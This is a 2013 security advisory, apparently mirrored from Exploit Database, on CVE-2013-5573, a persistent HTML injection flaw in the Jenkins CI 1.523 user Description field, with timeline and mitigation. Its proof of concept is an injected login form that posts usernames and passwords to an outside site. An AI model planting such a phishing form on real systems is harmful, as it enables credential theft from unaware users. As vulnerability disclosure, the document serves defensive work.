Jenkins 1.523 – Persistent HTML Code

• Exploit Database
• 20 阅读

• 作者： Christian Catalano
  日期： 2013-12-18
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/30408/

• ###################################################
  
  01. ###Advisory Information ###
  
  Title: Default markup formatter permits offsite-bound forms
  Date published : 2013-12-16
  Date of last update: 2013-12-16
  Vendors contacted : Jenkins CI v 1.523
  Discovered by: Christian Catalano
  Severity: Low
  
  
  02. ###Vulnerability Information ###
  
  CVE reference: CVE-2013-5573
  CVSS v2 Base Score: 4.7
  CVSS v2 Vector : (AV:N/AC:L/Au:M/C:P/I:P/A:N)
  Component/s : Jenkins CI v 1.523
  Class : HTML Injection
  
  
  03. ### Introduction ###
  
  Jenkins CI is an extendable open source continuous integration server 
  http://jenkins-ci.org.
  
  
  04. ### Vulnerability Description ###
  
  The default installation and configuration of Jenkins CI is prone to a 
  security vulnerability. The Jenkins CI default markup formatter permits 
  offsite-bound forms. This vulnerability could be exploited by a remote 
  attacker (a malicious user) to inject malicious persistent HTML script 
  code (application side).
  
  
  05. ### Technical Description / Proof of Concept Code ###
  
  The vulnerability is located in the 'Descriotion' input field of the 
  User Configurationfunction:
  
  https://localhost:9444/jenkins/user/attacker/configure
  
  To reproduce the vulnerability,the attacker (a malicious user) can add 
  the malicious HTML script code:
  
  <form method="POST" action="http://www.mocksite.org/login/login.php.">
  Username: <input type="text" name="username" size="15" /><br />
  Password: <input type="password" name="passwort" size="15" /><br />
  <div align="center">
  <p><input type="submit" value="Login" /></p>
  </div>
  </form>
  
  in the 'Descriotion' input field and click on save button.
  The code execution happens when the victim (an unaware user) view the 
  'People List'
  
  https://localhost:9444/jenkins/asynchPeople/
  
  and click on attacker user id.
  
  
  06. ### Business Impact ###
  
  Exploitation of the persistent web vulnerability requires a low 
  privilege web application user account.
  Successful exploitation of the vulnerability results in persistent 
  phishing and persistent external redirects.
  
  
  07. ### Systems Affected ###
  
  
  This vulnerability was tested against:
  Jenkins CI v1.523
  Older versions are probably affected too, but they were not checked.
  
  
  08. ### Vendor Information, Solutions and Workarounds ###
  
  Currently, there are no known upgrades or patches to correct this 
  vulnerability. It is possible to temporarily mitigate the flaw by 
  implementing the following workaround:
  'MyspacePolicy' permits
  tag("form", "action", ONSITE_OR_OFFSITE_URL,
   "method");
  
  Fix 'MyspacePolicy' by restricting the policy to ONSITE_URL only or 
  perhaps <form> could be banned entirely.
  
  
  09. ### Credits ###
  
  This vulnerability has been discovered by:
  Christian Catalano aka wastasy ch(dot)catalano(at)gmail(dot)com
  
  
  10.### Vulnerability History ###
  
  August 21th, 2013: Vulnerability identification
  August4th, 2013: Vendor notification [Jenkins CI]
  November 19th, 2013: Vulnerability confirmation [Jenkins CI]
  November 19th, 2013: Vendor Solution
  December 16th, 2013: Vulnerability disclosure
  
  11. ### Disclaimer ###
  
  The information contained within this advisory is supplied "as-is" with 
  no warranties or guarantees of fitness of use or otherwise.
  I accept no responsibility for any damage caused by the use or misuse of 
  this information.
  
  ###################################################